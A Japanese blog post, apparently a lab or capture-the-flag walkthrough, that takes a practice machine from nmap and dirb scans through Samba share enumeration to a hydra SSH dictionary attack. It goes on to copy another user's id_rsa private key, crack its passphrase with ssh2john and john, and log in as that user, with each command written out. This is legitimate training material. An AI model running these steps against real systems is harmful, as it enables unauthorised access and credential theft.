7日間でハッ〇ングをはじめる本2

7日間でハッキングをはじめる本 7日間でハッ〇ングをはじめる本
7日間でハッキングをはじめる本

Try Harder!!!

辞書攻撃

過去の漏洩パスワードでクラック

まずは、情報収集。

nmap

nmap でターゲットマシンの開いたポートの探索。

nmapオプション意味
-sVサービスバージョンの特定。
-PnIMCPリクエストを送信しないオプション。
(よくわかんね。)
-oN<ファイル名>スキャン結果の保存
-v進捗状況の表示

その他色々、オプションはあるみたい。

nmapの結果はこう。

# Nmap 7.98 scan initiated Mon Jan  5 13:27:23 2026 as: /usr/lib/nmap/nmap --privileged -sV -Pn -oN nmap.txt -v 10.49.145.108
Nmap scan report for 10.49.145.108
Host is up (0.26s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.41 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 4
445/tcp  open  netbios-ssn Samba smbd 4
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8080/tcp open  http        Apache Tomcat 9.0.7
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan  5 13:27:41 2026 -- 1 IP address (1 host up) scanned in 17.77 seconds

わかること。

  • http→WEBサイトが開いてる。
  • ssh→ID、パスワードがあれば侵入可能性あり。
  • Samba→フォルダの共有あり。

とりあえず。WEBサイト見よう。

結果。特に大きな情報なし。

dirb

$dirb http://<アドレス> <辞書>

2つ目の引数に辞書を選択。Kaliならこれ。

/usr/share/dirb/wordlists/small.txt

辞書で総当りし「/development/」が存在しアクセス可能状態である。

情報あるかもしれないので確認。

Sambaの共有フォルダに接続し情報を取得

使用コマンド

smbclient -L <アドレス>

-L はサーバ情報を取得するオプション

接続するには

smbclient \\\\<アドレス>\\<sharename>

接続後、lsなどで内部情報の取得。

気になるファイルはダウンロード

smb: \> get <ファイル名>

なんと、ここでスタッフの名前がわかりました。脆弱脆弱!

hydraで辞書攻撃

辞書攻撃を行うコード

hydra -l <user名> -P <辞書ファイル> ssh://<アドレス> -t 4
オプション意味
-l <user名>攻撃ターゲットの名前
-P使用辞書ファイル(rockyou.txt等)
ssh://<アドレス>ssh ログイン対象
-t 4並列処理数指定

これにより、ssh:<アドレス>におけるjanのパスワードが割れました。

sshに侵入し、ファイルを探し、それぞれの権限を確認すると秘密鍵が以下の場所より、読み取れた。

---/.ssh/id_rsa

sshから一度退出し、以下のコマンドを使用

scp <user>@<アドレス>:<ファイル指定> <宛先>

scpはファイル転送コマンド。

生のid_rsaの使用ステップ

  • ロックされているためパスフレーズの特定
  • chmod 600 でssh鍵を信用させる。
  • 以下のコマンドでパスフレーズ付きSSH鍵をJohnクラックように変換
 /usr/share/john/ssh2john.py id_rsa > sshkey.hash

ssh2john.pyがクラック形式に変換するスクリプト

  • rockyou.txt でハッシュのクラック
john --wordlist=/usr/share/wordlists/rockyou.txt sshkey.hash
  • ラストは秘密鍵とそのパスワードで上位権限アカウントに侵入
ssh -i id_rsa kay@<アドレス>

まとめ

まずは情報収集

権限の脆弱性をつく

上位権限を目指す。

コメント

タイトルとURLをコピーしました